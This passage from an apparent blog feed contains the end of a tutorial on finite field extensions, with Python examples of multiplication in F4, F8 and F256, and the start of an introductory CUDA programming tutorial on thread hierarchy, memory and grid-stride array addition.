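    if p != (0, 0):
        assert any(f4_mul(p, q) == one for q in elems)
# ...and multiplication is commutative and associative (finite check).
for p in elems:
    for q in elems:
        assert f4_mul(p, q) == f4_mul(q, p)
        for r in elems:
            assert f4_mul(f4_mul(p, q), r) == f4_mul(p, f4_mul(q, r))
```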
&lt;h4 id=&quot;notation&quot;&gt;Notation&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s introduce a notation with the same spirit as the complex numbers’ $a + bi$ notation. Similar to that case, let’s use the identification of $\mathbb F_2$ inside $\mathbb F_2^2$ and write $0$ and $1$ to mean $(0, 0)$ and $(1, 0)$. Now, instead of the symbol $i$ as with the complex numbers, let’s use $x$ to mean $(0, 1)$. There’s no deep reason for it; it’s just that $i$ is strongly associated with the complex numbers, and we want to emphasize that this is a different field. So now we have&lt;&#x2F;p&gt;
&lt;p&gt;$$(0,0) = 0 + 0x = 0$$&lt;br &#x2F;&gt;
$$(1, 0) = 1 + 0x = 1$$&lt;br &#x2F;&gt;
$$(0, 1) = 0 + 1x = x$$&lt;br &#x2F;&gt;
$$(1,1) = 1+1x = 1 + x$$&lt;&#x2F;p&gt;
&lt;p&gt;And using the multiplication rule we just discovered, we obtain $x^2 = 1 + x$.&lt;br &#x2F;&gt;
This equation is all we need to be able to multiply any two elements by repeatedly applying it whenever a power larger than $1$ appears. For example:&lt;br &#x2F;&gt;
$$(1+x)x = x + x^2 = x + 1 + x = 1.$$&lt;&#x2F;p&gt;
&lt;p&gt;The set $\mathbb F_2^2$ with this addition and multiplication has its symbol: it is denoted $\mathbb F_4$ and is called &lt;em&gt;the field with four elements&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;binary-strings-of-length-3&quot;&gt;Binary strings of length $3$&lt;&#x2F;h2&gt;
&lt;p&gt;The same process can be done with triplets $(a,b,c)$ of elements of $\mathbb F_2$. The elements of this set are $(0,0,0), (1,0,0), (0,1,0),(1,1,0)$, etc. It has $8$ elements, and we will denote it by $\mathbb F_2^3$. We have the component-wise addition&lt;br &#x2F;&gt;
$$(a,b,c) + (a’,b’,c’) = (a+a’, b+b’, c+c’)$$&lt;br &#x2F;&gt;
We can play the same game as before and discover a multiplication rule on $\mathbb F_2^3$ such that it forms a field together with the component-wise addition. In this case, we can even find one such that $(0,1,0)\cdot(0,1,0) = (0,0,1)$. We are not going to show the whole process. You can try it out for yourself!&lt;&#x2F;p&gt;
&lt;p&gt;Similar to the previous case, this field is denoted $\mathbb F_8$, and it’s the unique field with $8$ elements.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;notation-1&quot;&gt;Notation&lt;&#x2F;h4&gt;
&lt;p&gt;We identify $\mathbb F_2$ in $\mathbb F_8$ as the elements with null second and third coordinates. That is, $\mathbb F_2$ is $\{(0,0,0), (1,0,0)\}$.&lt;&#x2F;p&gt;
&lt;p&gt;Now that we have three coordinates, we need two new symbols, $x$ and $y$, to write an element $(a,b,c)$ as $a + bx + cy$. But, since $(0,1,0)\cdot(0,1,0)$ equals $(0,0,1)$, we have $x^2 = y$. So we need only one symbol and can write $(a,b,c)$ as $a + bx+ cx^2$.&lt;&#x2F;p&gt;
&lt;p&gt;If you construct the multiplication rule as in the case of binary strings of length $2$ you’ll find that $(0,1,0)\cdot(0,0,1) = (1,1,0)$. With this notation, this is $x^3 = 1 + x$. Similar to the previous case. This equation is all we need to multiply elements. For example&lt;&#x2F;p&gt;
&lt;p&gt;$$(1 + x^2)(1 + x) = 1 + x + x^2 + x^3 = 1 + x + x^2 + 1 + x = x^2.$$&lt;&#x2F;p&gt;
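&lt;p&gt;As before, one equation drives all multiplications. Here is a small Python sketch (the bitmask representation and helper name are ours) that encodes elements of $\mathbb F_8$ as 3-bit masks and reduces with $x^3 = 1 + x$:&lt;&#x2F;p&gt;

```python
# Elements of F8 as 3-bit masks: bit i is the coefficient of x^i.
def f8_mul(u, v):
    # Carry-less (XOR-based) polynomial multiplication.
    r = 0
    for i in range(3):
        if (v >> i) & 1:
            r ^= u << i
    # Eliminate x^4 and x^3, highest first, using x^3 = 1 + x (mask 0b011).
    for i in (4, 3):
        if (r >> i) & 1:
            r ^= (1 << i) | (0b011 << (i - 3))
    return r

assert f8_mul(0b010, 0b100) == 0b011  # x · x^2 = x^3 = 1 + x
assert f8_mul(0b101, 0b011) == 0b100  # (1 + x^2)(1 + x) = x^2, as above
# Every nonzero element is invertible, so this really is a field:
for u in range(1, 8):
    assert any(f8_mul(u, v) == 1 for v in range(1, 8))
```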
&lt;h2 id=&quot;general-case&quot;&gt;General case!&lt;&#x2F;h2&gt;
&lt;p&gt;Suppose we start with $\mathbb F_p$, where $p$ is some prime number. We can consider the set of tuples $(a_0, a_1, \dots, a_{n-1})$, all of the same length $n$, and call that set $\mathbb F_{p^n}$. In there, we have the component-wise addition. A theorem states that there always exists a multiplication rule on $\mathbb F_{p^n}$ such that it forms a field! Moreover, all multiplication rules are essentially the same. And so this means that there is a unique field of $p^n$ elements.&lt;&#x2F;p&gt;
&lt;p&gt;Everything we showed for the binary strings of length $2$ and $3$ works here. We can write every element $(a_0, a_1, \dots, a_{n-1})$ as&lt;br &#x2F;&gt;
$$a_0 + a_1x + a_2x^2 + \cdots + a_{n-1}x^{n-1}$$&lt;&#x2F;p&gt;
&lt;p&gt;This notation is consistent with the multiplication rule, just like before. Also, there will be an equality of the form $x^n = b_0 + b_1x + \cdots + b_{n-1}x^{n-1}$ for some elements $b_i$ in $\mathbb F_p$.&lt;&#x2F;p&gt;
&lt;p&gt;And every finite field is of this form!&lt;&#x2F;p&gt;
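&lt;p&gt;The recipe can be turned into a short Python sketch (a hypothetical helper written for this post): multiply tuples as polynomials with coefficients mod $p$, then substitute high powers using the reduction row $x^n = b_0 + b_1x + \cdots + b_{n-1}x^{n-1}$.&lt;&#x2F;p&gt;

```python
# Multiplication in F_{p^n}: polynomial product of the tuples, followed by
# repeatedly replacing x^k (k >= n) via the reduction row b for x^n.
def ext_mul(u, v, p, b):
    n = len(u)
    prod = [0] * (2 * n - 1)
    for i, ui in enumerate(u):
        for j, vj in enumerate(v):
            prod[i + j] = (prod[i + j] + ui * vj) % p
    # Eliminate powers x^k with k >= n, highest first: x^k = x^(k-n) · b(x).
    for k in range(2 * n - 2, n - 1, -1):
        c = prod[k]
        if c:
            prod[k] = 0
            for j, bj in enumerate(b):
                prod[k - n + j] = (prod[k - n + j] + c * bj) % p
    return prod[:n]

# F4 again: p = 2, n = 2, x^2 = 1 + x, and (1 + x)·x = 1.
assert ext_mul([1, 1], [0, 1], 2, [1, 1]) == [1, 0]
# F8: p = 2, n = 3, x^3 = 1 + x, and (1 + x^2)(1 + x) = x^2.
assert ext_mul([1, 0, 1], [1, 1, 0], 2, [1, 1, 0]) == [0, 0, 1]
```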
&lt;h3 id=&quot;towers-of-fields&quot;&gt;Towers of fields&lt;&#x2F;h3&gt;
&lt;p&gt;The same works if we use any finite field $F$ as a building block. For example, we could start from $F = \mathbb F_8$. We can consider tuples $(a_0, \cdots, a_{n-1})$ of elements of $F$, and everything works the same way. There will always be a multiplication rule on $F^n$, making it a field. This is useful for constructing large extensions in small steps.&lt;&#x2F;p&gt;
&lt;p&gt;Say for example we need to work with $\mathbb F_{p^{12}}$, the field with $p^{12}$ elements (for some prime number $p$). We could construct it from scratch by finding a multiplication rule on $\mathbb F_p^{12}$, the set of tuples of length $12$ of elements of $\mathbb F_p$.&lt;br &#x2F;&gt;
Another approach is as follows. Construct first the field $\mathbb F_{p^6}$ of $p^6$ elements. Then consider tuples $(a,b)$ with $a,b \in \mathbb F_{p^6}$. There is a multiplicative rule on that set of tuples, making it a field. That will be $\mathbb F_{p^{12}}$. These are called field towers and are a common way of constructing finite fields.&lt;&#x2F;p&gt;
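&lt;p&gt;As a toy version of this idea, here is a Python sketch building $\mathbb F_{16}$ as pairs over $\mathbb F_4$. The reduction $t^2 = t + x$ is our own choice for illustration (it requires $t^2 + t + x$ to have no roots in $\mathbb F_4$, which the exhaustive check below confirms indirectly):&lt;&#x2F;p&gt;

```python
# F4 elements as 2-bit masks a0 + a1·x, with x^2 = 1 + x.
def f4_mul(u, v):
    a, b, c, d = u & 1, (u >> 1) & 1, v & 1, (v >> 1) & 1
    return ((a & c) ^ (b & d)) | ((((a & d) ^ (b & c) ^ (b & d))) << 1)

W = 0b10  # the element x of F4

# F16 as pairs (a, b) of F4 elements, meaning a + b·t with t^2 = t + x.
def f16_mul(p, q):
    a, b = p
    c, d = q
    # (a + bt)(c + dt) = ac + (ad + bc)t + bd·t^2, then t^2 = t + x.
    lo = f4_mul(a, c) ^ f4_mul(f4_mul(b, d), W)
    hi = f4_mul(a, d) ^ f4_mul(b, c) ^ f4_mul(b, d)
    return (lo, hi)

elems = [(a, b) for a in range(4) for b in range(4)]
# All 15 nonzero pairs have inverses, so the pairs form the field F16.
for p in elems:
    if p != (0, 0):
        assert any(f16_mul(p, q) == (1, 0) for q in elems)
```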
&lt;p&gt;The case of $\mathbb F_{p^{12}}$ is particularly interesting when working with the BLS12-377 or BLS12-381 curves. It is the field where all the points relevant to the pairings are defined.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-set-of-bytes&quot;&gt;The set of bytes&lt;&#x2F;h2&gt;
&lt;p&gt;Note that $\mathbb F_{256}$ is the set of all possible bytes. Its elements are tuples $(a_0, a_1,\dots, a_7)$ of elements of $\mathbb F_2$. We denote them by $a_0 + a_1x + a_2x^2 + \cdots + a_7x^7$. Here the equation is $x^8 = x^4 + x^3 + x + 1$.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Advanced_Encryption_Standard&quot;&gt;Advanced Encryption Standard&lt;&#x2F;a&gt; (AES) uses this field as part of the block cipher!&lt;&#x2F;p&gt;
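&lt;p&gt;Multiplication of bytes under this reduction is easy to sketch in Python with the classic shift-and-XOR loop (this is the field arithmetic inside AES, though AES itself specifies much more than this operation):&lt;&#x2F;p&gt;

```python
# Bytes as elements of F256: bit i is the coefficient of x^i,
# reduced with x^8 = x^4 + x^3 + x + 1 (mask 0x1B).
def gf256_mul(u, v):
    r = 0
    for _ in range(8):
        if v & 1:          # add the current shifted copy of u
            r ^= u
        v >>= 1
        carry = u & 0x80   # would shifting overflow past x^7?
        u = (u << 1) & 0xFF
        if carry:
            u ^= 0x1B      # replace x^8 by x^4 + x^3 + x + 1
    return r

assert gf256_mul(0x02, 0x80) == 0x1B  # x · x^7 = x^8 = x^4 + x^3 + x + 1
assert gf256_mul(0x53, 0xCA) == 0x01  # 0x53 and 0xCA are inverses in F256
```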
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In the same way that complex numbers are just pairs of real numbers, field extensions of finite fields are just tuples of elements of some $\mathbb F_p$. It is not evident how to come up with the multiplication rule, but mathematicians have proved that it always exists, and the resulting field is essentially unique in a rigorous way we are not mentioning here. Field extensions are essential in many proving systems, especially those relying on Kate-Zaverucha-Goldberg (KZG) commitments.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>CUDA&#x27;ve been faster: learning CUDA from scratch</title>
          <pubDate>Mon, 23 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/cuda-from-scratch/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/cuda-from-scratch/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/cuda-from-scratch/">&lt;h1 id=&quot;practical-cuda&quot;&gt;Practical CUDA&lt;&#x2F;h1&gt;
&lt;p&gt;CUDA is a parallel computing platform and programming model developed by NVIDIA for general computing on graphical processing units. We can use it to accelerate expensive computations, distributing the load over several processors. For example, in some &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;zk-SNARKs&lt;&#x2F;a&gt;, we have to calculate a &lt;a href=&quot;&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;&quot;&gt;multiscalar multiplication&lt;&#x2F;a&gt;, which involves summing lots of points on an &lt;a href=&quot;&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;elliptic curve&lt;&#x2F;a&gt; (for example, 100,000,000), \( \sum a_k P_k\), where \( P_k \) are points on the curve and \( a_k \) are positive integers. We can also use CUDA for other problems where the task is highly parallelizable, such as solving differential equations, performing fast Fourier transforms, sorting elements, etc.&lt;&#x2F;p&gt;
&lt;p&gt;CUDA is also widely used in Machine Learning algorithms, especially in those involving Deep Learning. It is also commonly found in game engines, image processing, and simulations for scientific purposes.&lt;&#x2F;p&gt;
&lt;p&gt;In GPU-accelerated applications, the sequential part of the workload runs on the CPU, while processing large blocks of data runs on thousands of GPU cores in parallel. GPUs are optimized to run that kind of work! The overall philosophy is that the different cores independently run the same set of instructions in parallel (the SIMT or &lt;strong&gt;S&lt;&#x2F;strong&gt;ingle &lt;strong&gt;I&lt;&#x2F;strong&gt;nstruction, &lt;strong&gt;M&lt;&#x2F;strong&gt;ultiple &lt;strong&gt;T&lt;&#x2F;strong&gt;hread model).&lt;&#x2F;p&gt;
&lt;p&gt;An excellent introduction to the CUDA programming model can be found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=4APkMJdiudU&amp;amp;list=PLC6u37oFvF40BAm7gwVP7uDdzmW83yHPe&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will focus on CUDA code, using Google Colab to show and run examples. But before we start with the code, we need an overview of some building blocks.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;building-blocks&quot;&gt;Building blocks&lt;&#x2F;h2&gt;
&lt;p&gt;With CUDA, we can run multiple threads in parallel to process data. These threads are grouped in different processing units with their data-sharing and synchronization primitives.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;logical-processing-units&quot;&gt;Logical processing units&lt;&#x2F;h3&gt;
&lt;p&gt;The most fundamental building block of our application is the thread. Threads are then grouped into &lt;strong&gt;Warps&lt;&#x2F;strong&gt;, which are grouped into &lt;strong&gt;Blocks&lt;&#x2F;strong&gt;, which are finally contained in a &lt;strong&gt;Grid&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Depending on our algorithms, warps can be ignored, or be used to further optimize our application, as we will see later.&lt;&#x2F;p&gt;
&lt;p&gt;As of this writing, each warp has 32 threads, and each block can hold up to 1024 threads, or 32 warps.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;1dc0TeK.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;physical-processing-units-and-memory&quot;&gt;Physical processing units and memory&lt;&#x2F;h3&gt;
&lt;p&gt;Blocks are run on &lt;strong&gt;Streaming Multiprocessors&lt;&#x2F;strong&gt;. Each streaming multiprocessor has 8 &lt;strong&gt;CUDA Cores&lt;&#x2F;strong&gt;*. These cores are also called Shaders or Streaming Processors.&lt;&#x2F;p&gt;
&lt;p&gt;A busy multiprocessor executes a warp, with its threads’ instructions running in parallel. Since warp threads run on the same multiprocessor, they can exchange information via &lt;strong&gt;Registers&lt;&#x2F;strong&gt; very quickly. This is useful because, once our application runs on as many threads as possible, the next way to improve performance is to reduce memory access.&lt;&#x2F;p&gt;
&lt;p&gt;Now that we have introduced registers, the next question we can ask is how do we share information between warps and between blocks? Let’s go upwards through the memory hierarchy.&lt;&#x2F;p&gt;
&lt;p&gt;Each Streaming Multiprocessor has an &lt;strong&gt;SRAM&lt;&#x2F;strong&gt;. Its size depends on the graphic card. For example, in a V100, it is 128 KiB, and 192 KiB in an A100.&lt;&#x2F;p&gt;
&lt;p&gt;This SRAM has a double purpose. First, it is used as an &lt;strong&gt;L1 cache&lt;&#x2F;strong&gt; in a way that is transparent to the programmer. A secondary use is as &lt;strong&gt;Shared Memory&lt;&#x2F;strong&gt;. This shared memory enables the programmer to share data inside a block in a fast manner.&lt;&#x2F;p&gt;
&lt;p&gt;Since the SRAM has two functionalities, CUDA allows the programmer to define how much of the SRAM can be used as an L1 cache and how much as Shared Memory.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, we have &lt;strong&gt;Global Memory&lt;&#x2F;strong&gt;. This memory is the one we see in the specifications of graphic cards as GPU Memory and the one allocated with &lt;code&gt;cudaMalloc()&lt;&#x2F;code&gt;. Global Memory allows us to share data between thread blocks seamlessly.&lt;&#x2F;p&gt;
&lt;p&gt;As tends to happen with hardware, operations become more expensive as we move to larger memories.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;gr4u7ru.png&quot; alt=&quot; &quot; &#x2F;&gt;&lt;br &#x2F;&gt;
&lt;em&gt;image from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;developer.nvidia.com&#x2F;blog&#x2F;cuda-refresher-cuda-programming-model&#x2F;&quot;&gt;Cuda Refresher - Nvidia blog&lt;&#x2F;a&gt;&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;p&gt;*&lt;em&gt;Nvidia has also released a new kind of core, called Tensor Cores, for its Tensor Core GPUs. These cores can run a small matrix multiplication of floating points in mixed precision as a native operation to further optimize machine learning algorithms.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;programming-in-cuda&quot;&gt;Programming in CUDA&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;starting-simple-array-addition&quot;&gt;Starting - Simple array addition&lt;&#x2F;h3&gt;
&lt;p&gt;We will start by parallelizing some elementary operations and using only global memory. Let’s start making a program that adds two arrays.&lt;&#x2F;p&gt;
&lt;p&gt;Before we start, there are some standard procedures we need to do:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;For each function or kernel to run on the device, we need to define the following:
&lt;ul&gt;
&lt;li&gt;How many blocks do we use?&lt;&#x2F;li&gt;
&lt;li&gt;How many threads do we include per block?&lt;&#x2F;li&gt;
&lt;li&gt;How are the blocks indexed?&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;We need to allocate and copy data to the device&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Picking the best parameters for the kernel is a topic of its own, but it’s good to keep in mind that the number of threads per block should be a multiple of the number of threads per warp, 32.&lt;&#x2F;p&gt;
&lt;p&gt;Lastly, we need to decide how the blocks are indexed. We can set them to be accessed as a 1, 2, or 3-dimensional array. We are then picking between a typical array, a matrix, or a cube.&lt;&#x2F;p&gt;
&lt;p&gt;To the device, it is just an index, so the choice does not affect correctness. But it is helpful for the programmer to pick something related to the problem being solved. If we add arrays, one dimension is suitable; if we are processing images, two dimensions are the best pick; and if we are working with 3D models, it makes sense to use three-dimensional indexing.&lt;&#x2F;p&gt;
&lt;p&gt;In our case, we will define the following dimensions:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dim3 threadsPerBlock(128);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dim3 numBlocks(1024*1024);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we wanted a 2d array, we could do&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dim3 threadsPerBlock(128);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dim3 numBlocks(1024,1024);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now, we also need to allocate some memory in our device and copy the arrays we want to add.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s assume we want to add two byte arrays, array1 and array2, each with AMOUNT_OF_ELEMENTS elements. Then we can reserve space for the two arrays and the result with:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;char* array1_in_device;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;char* array2_in_device;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;char* result_in_device;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMalloc(&amp;amp;array1_in_device, AMOUNT_OF_ELEMENTS);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMalloc(&amp;amp;array2_in_device, AMOUNT_OF_ELEMENTS);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMalloc(&amp;amp;result_in_device, AMOUNT_OF_ELEMENTS);    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMemcpy(array1_in_device, array1, AMOUNT_OF_ELEMENTS, cudaMemcpyHostToDevice);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cudaMemcpy(array2_in_device, array2, AMOUNT_OF_ELEMENTS, cudaMemcpyHostToDevice);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Notice we do not need to store the result in a different place if we do not need the original arrays after the addition inside CUDA. It is also common to use a single allocation and index into it at each piece of data’s offset. But since this is the first program, we will keep it as simple as possible.&lt;&#x2F;p&gt;
&lt;p&gt;Now, let’s focus on the algorithm.&lt;&#x2F;p&gt;
&lt;p&gt;A simple non-CUDA code to solve this problem would look like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for(int i = 0; i &amp;lt; MAX_ELEMENTS; i++)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    solution_array[i] = a[i] + b[i]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we assume we have one core for each index, we can drop the loop and let each thread compute a single addition. But that assumption does not always hold, and it produces solutions that aren’t flexible enough. So we will use strides instead.&lt;&#x2F;p&gt;
&lt;p&gt;Strides are nothing more than steps in a for loop to distribute the load between threads. For example, if we had a stride of 4, Thread 0 would process elements 0, 4, 8, 12, …, Thread 1 would process elements 1, 5, 9, 13, …, and so on.&lt;&#x2F;p&gt;
&lt;p&gt;Instead of fixing the stride to one number, we can use CUDA primitives to make our algorithm flexible enough to work with different sizes of arrays and blocks. Our algorithm, using CUDA, would then become:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;__global__ void sum_arrays(char* array1, char* array2, char* result){&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    uint globalThreadID = blockIdx.x*blockDim.x+threadIdx.x;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    uint stride = gridDim.x*blockDim.x;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (int i = globalThreadID; i &amp;lt; AMOUNT_OF_ELEMENTS; i += stride){&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        result[i] = array1[i] + array2[i];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here &lt;code&gt;__global__&lt;&#x2F;code&gt; indicates it’s a function that runs on the device and can be called from the host.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;blockIdx&lt;&#x2F;code&gt; is the block’s id, and &lt;code&gt;blockDim&lt;&#x2F;code&gt; is the number of threads in the block. &lt;code&gt;threadIdx&lt;&#x2F;code&gt; is the id of the thread inside the block. Notice then, by doing&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;uint globalThreadID = blockIdx.x*blockDim.x+threadIdx.x;&lt;&#x2F;code&gt;&lt;&#x2F;p&gt;
&lt;p&gt;we obtain a unique thread ID, independent of the block, that’s useful to split the work.&lt;&#x2F;p&gt;
&lt;p&gt;The stride is the total number of threads in the grid, so the work is split evenly among them.&lt;&#x2F;p&gt;
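&lt;p&gt;To convince ourselves the indexing is correct, we can simulate the grid-stride loop on the CPU. The Python sketch below (with made-up small sizes standing in for the launch parameters) checks that every element is processed exactly once:&lt;&#x2F;p&gt;

```python
# CPU simulation of the grid-stride loop above, with made-up small sizes.
GRID_DIM = 4     # number of blocks      (gridDim.x)
BLOCK_DIM = 8    # threads per block     (blockDim.x)
N = 100          # AMOUNT_OF_ELEMENTS

counts = [0] * N
for block_idx in range(GRID_DIM):
    for thread_idx in range(BLOCK_DIM):
        global_thread_id = block_idx * BLOCK_DIM + thread_idx
        stride = GRID_DIM * BLOCK_DIM
        i = global_thread_id
        while i < N:          # each "thread" walks its strided indices
            counts[i] += 1
            i += stride

# No gaps and no overlaps: every element is processed exactly once.
assert counts == [1] * N
```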
&lt;p&gt;Finally, to call this function from the host, we use the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;sum_arrays&amp;lt;&amp;lt;&amp;lt;numBlocks, threadsPerBlock&amp;gt;&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    array1_in_device, array2_in_device, result_in_device&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The complete code can be read and run by copying the following &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;colab.research.google.com&#x2F;drive&#x2F;1SXZjOpb7t352VctCQ6xLhYZJCi2zCB_A?usp=sharing&quot;&gt;Google Colab notebook&lt;&#x2F;a&gt;. We have also added some examples of matrix addition to show how the indexing works with more dimensions.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;host-device-parallelism&quot;&gt;Host - Device parallelism&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s reuse the same &lt;code&gt;sum_arrays()&lt;&#x2F;code&gt; function in a different way and examine another scenario.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose we call our function in the device from the host; after that, we write operations for the CPU. What happens in this scenario? Is the code run, or does it wait for the device?&lt;&#x2F;p&gt;
&lt;p&gt;To answer the first question, let’s take some measures.&lt;&#x2F;p&gt;
&lt;p&gt;We will make a program that does a lot of work over a small array and then retrieve the data in two chunks. And we will also measure the time it takes to call the function to retrieve both pieces.&lt;&#x2F;p&gt;
&lt;p&gt;Since the code is a bit long, we will leave it in the same &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;colab.research.google.com&#x2F;drive&#x2F;1SXZjOpb7t352VctCQ6xLhYZJCi2zCB_A?authuser=3#scrollTo=3jyEZO03whXD&amp;amp;line=26&amp;amp;uniqifier=1&quot;&gt;google colab&lt;&#x2F;a&gt; we used before, so feel free to copy and run it by yourself.&lt;&#x2F;p&gt;
&lt;p&gt;What happens, then?&lt;&#x2F;p&gt;
